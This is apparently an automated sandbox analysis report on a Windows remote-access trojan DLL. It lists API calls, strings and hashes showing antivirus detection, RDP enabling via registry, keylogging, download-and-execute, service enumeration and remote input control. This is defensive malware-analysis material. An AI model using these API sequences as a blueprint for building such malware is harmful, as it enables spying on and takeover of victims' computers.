                                                                                                • Part of subcall function 10012620: Process32First.KERNEL32(00000000,00000000), ref: 10012646
                                                                                                • Part of subcall function 10012620: _strcmpi.MSVCRT ref: 10012658
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wsprintf$lstrlen$_strrev$CloseGlobalMemoryNameOpenQueryStatusValue$??2@ComputerCountCreateDiskDriveFileFirstFreeInfoInformationLogicalProcess32SnapshotSpaceStringsTickToolhelp32UserVersionVolume_strcmpi
                                                                                              • String ID: 360tray.exe$@$@$ESET $HARDWARE\DESCRIPTION\System\CentralProcessor\0$HARDWARE\DESCRIPTION\System\CentralProcessor\0$KSafeTray.exe$KvMonXP.exe$PortNumber$ProcessorNameString$QQPCTray.exe$SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp$egui.exe$exe.DnoMvaR$exe.ds063$exe.pva$kxetray.exe$~MHz
                                                                                              • API String ID: 1471316505-3197601762
                                                                                              • Opcode ID: 0a2200de033f60b7763fec6134aa8c7effb7a67c4c5f73fab1d444603738a109
                                                                                              • Instruction ID: f75789e8d26e0488ce98ecbec9e6a297644c4fc480bb15a39e026aad78d3882d
                                                                                              • Opcode Fuzzy Hash: 0a2200de033f60b7763fec6134aa8c7effb7a67c4c5f73fab1d444603738a109
                                                                                              • Instruction Fuzzy Hash: A0E1D7B1504385AFE720CB64CC45FEBB7DAEFC4340F40892DF68597251EB74AA098B66
                                                                                              APIs
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10010811
                                                                                              • OutputDebugStringA.KERNEL32(OpenSCManager Error), ref: 10010826
                                                                                              • LocalAlloc.KERNEL32(00000040,00010000), ref: 10010839
                                                                                              • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,00010000,?,?,?), ref: 10010857
                                                                                              • LocalAlloc.KERNEL32(00000040,00000104), ref: 10010864
                                                                                              • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 100108AF
                                                                                              • LocalAlloc.KERNEL32(00000040,00001000), ref: 100108C2
                                                                                              • QueryServiceConfigA.ADVAPI32(00000000,00000000,00001000,?), ref: 100108D6
                                                                                              • lstrcat.KERNEL32(00000000,1007B8FC), ref: 1001091B
                                                                                              • lstrcat.KERNEL32(?,1007B8F4), ref: 1001093E
                                                                                              • lstrcat.KERNEL32(?,1007B8EC), ref: 10010961
                                                                                              • lstrcat.KERNEL32(?,1007B8E4), ref: 10010984
                                                                                              • wsprintfA.USER32 ref: 100109A1
                                                                                              • wsprintfA.USER32 ref: 100109CF
                                                                                                • Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538
                                                                                                • Part of subcall function 1000E630: RegQueryValueExA.ADVAPI32(?,100109FB,00000000,100109FB,?), ref: 1000E653
                                                                                              • wsprintfA.USER32 ref: 10010A10
                                                                                              • lstrlen.KERNEL32(?), ref: 10010A19
                                                                                              • lstrlen.KERNEL32(?), ref: 10010A25
                                                                                              • lstrlen.KERNEL32(?), ref: 10010A31
                                                                                              • lstrlen.KERNEL32(?), ref: 10010A3A
                                                                                              • lstrlen.KERNEL32(?), ref: 10010A46
                                                                                              • lstrlen.KERNEL32 ref: 10010A4D
                                                                                              • lstrlen.KERNEL32(?), ref: 10010A55
                                                                                              • LocalSize.KERNEL32(?), ref: 10010A67
                                                                                              • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 10010A75
                                                                                              • lstrlen.KERNEL32(?), ref: 10010A83
                                                                                              • lstrlen.KERNEL32(?), ref: 10010AA8
                                                                                              • lstrlen.KERNEL32(00000000), ref: 10010AB9
                                                                                              • lstrlen.KERNEL32(00000001), ref: 10010AD7
                                                                                              • lstrlen.KERNEL32(?), ref: 10010AED
                                                                                              • lstrlen.KERNEL32(?), ref: 10010B0E
                                                                                              • lstrlen.KERNEL32(?), ref: 10010B24
                                                                                              • lstrlen.KERNEL32(?), ref: 10010B4C
                                                                                              • lstrlen.KERNEL32(?), ref: 10010B5F
                                                                                              • lstrlen.KERNEL32(?), ref: 10010B81
                                                                                              • lstrlen.KERNEL32(?), ref: 10010B97
                                                                                              • lstrlen.KERNEL32(?), ref: 10010BBF
                                                                                              • lstrlen.KERNEL32(?), ref: 10010BD5
                                                                                              • lstrlen.KERNEL32(?), ref: 10010BFD
                                                                                              • CloseServiceHandle.ADVAPI32(?), ref: 10010C10
                                                                                              • LocalFree.KERNEL32(?), ref: 10010C1B
                                                                                                • Part of subcall function 1000E4C0: RegCloseKey.ADVAPI32(?,?,10010C35), ref: 1000E56B
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 10010C56
                                                                                              • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 10010C64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: lstrlen$Local$Alloc$Servicelstrcat$CloseOpenwsprintf$HandleQuery$ConfigDebugEnumFreeManagerOutputServicesSizeStatusStringValue
                                                                                              • String ID: Description$OpenSCManager Error$SYSTEM\CurrentControlSet\Services\%s
                                                                                              • API String ID: 1351573288-819907790
                                                                                              • Opcode ID: 1a881d35233bf88a2e802367d92db6c209cf20d2a01c2cbbb9a98567baa261a7
                                                                                              • Instruction ID: b787a0c5a13c364073f78a8c29dfe8d65fa9e81c690259f46e75a22daf9f128f
                                                                                              • Opcode Fuzzy Hash: 1a881d35233bf88a2e802367d92db6c209cf20d2a01c2cbbb9a98567baa261a7
                                                                                              • Instruction Fuzzy Hash: 94E18D722083859FD724CF24CC84AABB7E6FBC8700F44491DF68A97240DB75E949CB96
                                                                                              APIs
                                                                                                • Part of subcall function 1000B030: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 1000B04E
                                                                                                • Part of subcall function 1000B030: lstrlen.KERNEL32(?), ref: 1000B05E
                                                                                                • Part of subcall function 1000B030: RegSetValueExA.ADVAPI32(?,?,00000000,00000002,?,00000000), ref: 1000B074
                                                                                                • Part of subcall function 1000B030: RegCloseKey.ADVAPI32(?), ref: 1000B084
                                                                                                • Part of subcall function 1000B090: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 1000B0AE
                                                                                                • Part of subcall function 1000B090: RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 1000B0CD
                                                                                                • Part of subcall function 1000B090: RegCloseKey.ADVAPI32(?), ref: 1000B0DC
                                                                                              • _strrev.MSVCRT ref: 1000B150
                                                                                              • _strrev.MSVCRT ref: 1000B16F
                                                                                              • GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,PortNumber), ref: 1000B24A
                                                                                                • Part of subcall function 10011F80: GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
                                                                                                • Part of subcall function 10011F80: OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97
                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 1000B276
                                                                                                • Part of subcall function 10011F80: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10011FC7
                                                                                                • Part of subcall function 10011F80: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FDF
                                                                                                • Part of subcall function 10011F80: GetLastError.KERNEL32(?,10009CF0,?,00000000,00000000,00000001), ref: 10011FE5
                                                                                                • Part of subcall function 10011F80: CloseHandle.KERNEL32(?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FF6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseValue$CreateProcessToken_strrev$AdjustCurrentErrorExitHandleLastLookupOpenPrivilegePrivilegesVersionWindowslstrlen
                                                                                              • String ID: .DEFAULT\Keyboard Layout\Toggle$EnableAdminTSRemote$Enabled$Hotkey$PortNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows\CurrentVersion\netcache$SOFTWARE\Policies\Microsoft\Windows\Installer$SYSTEM\CurrentControlSet\Control\Terminal Server$SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp$SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp$SYSTEM\CurrentControlSet\Services\TermDD$SYSTEM\CurrentControlSet\Services\TermService$SeShutdownPrivilege$ShutdownWithoutLogon$Start$delbanEST$fDenyTSConnections$tratS
                                                                                              • API String ID: 3375006655-3505973513
                                                                                              • Opcode ID: b6b36289de5a6afeaa3dcec66aeabf9fe826455a63fa939151772377f311329d
                                                                                              • Instruction ID: dc20f7a170daff86b313850e6ec23c72e1b0ea6aef47688a3a0a21085afcf0ea
                                                                                              • Opcode Fuzzy Hash: b6b36289de5a6afeaa3dcec66aeabf9fe826455a63fa939151772377f311329d
                                                                                              • Instruction Fuzzy Hash: AA31A174940F28B5F120E6A04C4FFEB6648CB50788F10C418FBD878287FB697261816F
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(000007D0), ref: 1000B6FF
                                                                                              • GetTickCount.KERNEL32 ref: 1000B753
                                                                                              • wsprintfA.USER32 ref: 1000B768
                                                                                              • URLDownloadToFileA.URLMON(00000000,?,C:\,00000000,00000000), ref: 1000B780
                                                                                              • GetTempPathA.KERNEL32(00000104,?,00000000,?,C:\,00000000,00000000), ref: 1000B794
                                                                                              • fopen.MSVCRT ref: 1000B7A4
                                                                                              • fscanf.MSVCRT ref: 1000B7CB
                                                                                              • GetTickCount.KERNEL32 ref: 1000B7D9
                                                                                              • wsprintfA.USER32 ref: 1000B7F1
                                                                                              • GetTickCount.KERNEL32 ref: 1000B7F6
                                                                                              • wsprintfA.USER32 ref: 1000B80E
                                                                                              • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 1000B829
                                                                                              • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 1000B843
                                                                                              • fscanf.MSVCRT ref: 1000B857
                                                                                              • fclose.MSVCRT ref: 1000B866
                                                                                              • DeleteFileA.KERNEL32(C:\), ref: 1000B874
                                                                                              • Sleep.KERNEL32(?), ref: 1000B8BA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CountFileTickwsprintf$DownloadSleepfscanf$DeleteExecutePathShellTempfclosefopen
                                                                                              • String ID: %s$%s%d.exe$%s?abc=%d$C:\$open
                                                                                              • API String ID: 2342319182-3740277425
                                                                                              • Opcode ID: efc8b2f9a9451763ca32a080153ffa4e9b1549faa23eaf1f7e5fb8289fbcb6d9
                                                                                              • Instruction ID: 0df0333b831ebe22e1ced74288834e4a7ee40290f568383da85469ab5f36e64c
                                                                                              • Opcode Fuzzy Hash: efc8b2f9a9451763ca32a080153ffa4e9b1549faa23eaf1f7e5fb8289fbcb6d9
                                                                                              • Instruction Fuzzy Hash: E6410471108391ABF324DB60CC89FEB379DEB84701F008918FB8996180DFB5AA08C766
                                                                                              APIs
                                                                                              • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 100070B0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AccountLookupName
                                                                                              • String ID: .$2$3$ConvertSidToStringSidA$L$_RasDefaultCredentials#0$i$p$v
                                                                                              • API String ID: 1484870144-2807325862
                                                                                              • Opcode ID: 8034a4ce6335c7b49751b7c807799d4bf0c4f4392b1383a7d8b7beda29235542
                                                                                              • Instruction ID: e483fb9418fd38a6f4b972ea0e4669484a3c348eff1775e07851af791e1d4d35
                                                                                              • Opcode Fuzzy Hash: 8034a4ce6335c7b49751b7c807799d4bf0c4f4392b1383a7d8b7beda29235542
                                                                                              • Instruction Fuzzy Hash: 7A21307150C382AFE301CB64D884B9BBBE4ABA5744F44894CF4D846252E2B8D64DC7A3
                                                                                              APIs
                                                                                              • lstrlen.KERNEL32(?,?,?,?), ref: 10008B8A
                                                                                              • wsprintfA.USER32 ref: 10008BC3
                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 10008BD5
                                                                                              • wsprintfA.USER32 ref: 10008C14
                                                                                              • wsprintfA.USER32 ref: 10008C37
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000018,?,00000001,?,?,?,?,?,?,?,?,?), ref: 10008CAD
                                                                                              • ??3@YAXPAX@Z.MSVCRT(0000005C), ref: 10008D16
                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 10008D45
                                                                                              • FindClose.KERNEL32(?), ref: 10008D58
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Findwsprintf$File$??2@??3@CloseFirstNextlstrlen
                                                                                              • String ID: %s%s%s$%s%s*.*$.
                                                                                              • API String ID: 862180513-1343461528
                                                                                              • Opcode ID: e14b18b942a39200a656cf70c3732ae3f0ccc213fc944e3a0910edc23c46a763
                                                                                              • Instruction ID: 519f5399ce91295c37a26932b4474774ed52c623669e24a96c359b1586835bbf
                                                                                              • Opcode Fuzzy Hash: e14b18b942a39200a656cf70c3732ae3f0ccc213fc944e3a0910edc23c46a763
                                                                                              • Instruction Fuzzy Hash: E851D1B14083809FE724CF28C884A9BBBE5FBC8750F404A1DE5D957291DB75EA09CB56
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(0000000A), ref: 10009A66
                                                                                              • lstrlen.KERNEL32(?), ref: 10009A71
                                                                                              • GetKeyState.USER32(00000010), ref: 10009ABB
                                                                                              • GetAsyncKeyState.USER32(0000000D), ref: 10009AC7
                                                                                              • GetKeyState.USER32(00000014), ref: 10009AD4
                                                                                              • GetKeyState.USER32(00000014), ref: 10009AFC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: State$AsyncSleeplstrlen
                                                                                              • String ID: <BackSpace>$<Enter>
                                                                                              • API String ID: 43598291-3792472884
                                                                                              • Opcode ID: 4cb686313a3aaed75b557f55e3074a30152c4a23e458e5b372660717e72530fa
                                                                                              • Instruction ID: 6c961daac165878122585f88262e92b73c779f3799918725d04435c3580de12f
                                                                                              • Opcode Fuzzy Hash: 4cb686313a3aaed75b557f55e3074a30152c4a23e458e5b372660717e72530fa
                                                                                              • Instruction Fuzzy Hash: 5D5165325083869BFB10DF64ED947AF73E9EB86390F000D28E99183094EB75D849C393
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$Filewsprintf$CloseDirectoryFirstNextRemove
                                                                                              • String ID: %s\%s$%s\*.*$.
                                                                                              • API String ID: 2470771279-1471744235
                                                                                              • Opcode ID: 48a094ecb4422aae30d04e3c8334305c3e5488b34c2e9b4639e197224751b74a
                                                                                              • Instruction ID: 4997ef6c0a53b4edcb34f252ea04d2ab30cd8e24f1ff6c4f86697f3dae8976e3
                                                                                              • Opcode Fuzzy Hash: 48a094ecb4422aae30d04e3c8334305c3e5488b34c2e9b4639e197224751b74a
                                                                                              • Instruction Fuzzy Hash: D111A8711083955BF220DBA0DCC8EEB77ACFFC5351F054C19F69942144E7B9964887A6
                                                                                              APIs
                                                                                              • LocalAlloc.KERNEL32(00000040,00002800), ref: 10008542
                                                                                              • wsprintfA.USER32 ref: 1000855F
                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 10008575
                                                                                              • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 100085CB
                                                                                              • lstrlen.KERNEL32(?), ref: 1000865A
                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 100086AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocFileFindLocal$FirstNextlstrlenwsprintf
                                                                                              • String ID: %s\*.*$h
                                                                                              • API String ID: 1497773571-1052742963
                                                                                              • Opcode ID: 49f82c9bf525e0a1cf95f818f3b63bf61a03bec1fa494d0cba9411899341019a
                                                                                              • Instruction ID: 6dc3bffa24102d40f333cfea9b115bd59c6de41bc40a21ef2b6d5182f104caaf
                                                                                              • Opcode Fuzzy Hash: 49f82c9bf525e0a1cf95f818f3b63bf61a03bec1fa494d0cba9411899341019a
                                                                                              • Instruction Fuzzy Hash: 825178319083829BE720CF248C8468BBBE6FF95384F014618FDD497381D77A9A09CB95
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(80000000,Applications\iexplore.exe\shell\open\command,00000000,000F003F,?), ref: 1000A6FA
                                                                                              • RegQueryValueA.ADVAPI32(?,00000000,?,00000104), ref: 1000A718
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 1000A723
                                                                                              • Sleep.KERNEL32(00000001), ref: 1000A72B
                                                                                              • lstrlen.KERNEL32(?), ref: 1000A736
                                                                                              • strstr.MSVCRT ref: 1000A74A
                                                                                              • lstrcpy.KERNEL32(00000000,?), ref: 1000A759
                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1000A7AE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateOpenProcessQuerySleepValuelstrcpylstrlenstrstr
                                                                                              • String ID: Applications\iexplore.exe\shell\open\command$D
                                                                                              • API String ID: 454182167-535818822
                                                                                              • Opcode ID: d166301520a6c393a5c7806a275e1dfa34a3405b019410c6f3728d46fc736ab6
                                                                                              • Instruction ID: 593cd418b48c47020334956aaadb0b49f021ee54466ec57afc295a09b57ba92d
                                                                                              • Opcode Fuzzy Hash: d166301520a6c393a5c7806a275e1dfa34a3405b019410c6f3728d46fc736ab6
                                                                                              • Instruction Fuzzy Hash: 36216071208351AFF710CB60CD49FAB77E9EB85741F00491CF689962D0DBF8A948CB62
                                                                                              APIs
                                                                                                • Part of subcall function 10012980: GetCurrentThreadId.KERNEL32 ref: 10012992
                                                                                                • Part of subcall function 10012980: GetThreadDesktop.USER32(00000000), ref: 10012999
                                                                                                • Part of subcall function 10012980: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129C6
                                                                                                • Part of subcall function 10012980: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 100129D1
                                                                                                • Part of subcall function 10012980: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129FE
                                                                                                • Part of subcall function 10012980: lstrcmpiA.KERNEL32(?,?), ref: 10012A0D
                                                                                                • Part of subcall function 10012980: SetThreadDesktop.USER32(00000000), ref: 10012A18
                                                                                                • Part of subcall function 10012980: CloseDesktop.USER32(00000000), ref: 10012A30
                                                                                                • Part of subcall function 10012980: CloseDesktop.USER32(00000000), ref: 10012A33
                                                                                              • SetCursorPos.USER32(?,?,?,?,?,?,1000F46F,?,?,00000000), ref: 1000F8A8
                                                                                              • WindowFromPoint.USER32(?,?,?,?,?,?,1000F46F,?,?,00000000), ref: 1000F8B0
                                                                                              • SetCapture.USER32(00000000,?,?,?,?,1000F46F,?,?,00000000), ref: 1000F8B7
                                                                                              • MapVirtualKeyA.USER32(?,00000000), ref: 1000F8F6
                                                                                              • keybd_event.USER32(?,00000000), ref: 1000F900
                                                                                              • MapVirtualKeyA.USER32(?,00000000), ref: 1000F914
                                                                                              • keybd_event.USER32(00000000,00000000), ref: 1000F91E
                                                                                              • mouse_event.USER32(00000008,00000000,00000000,00000000,00000000), ref: 1000F9DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
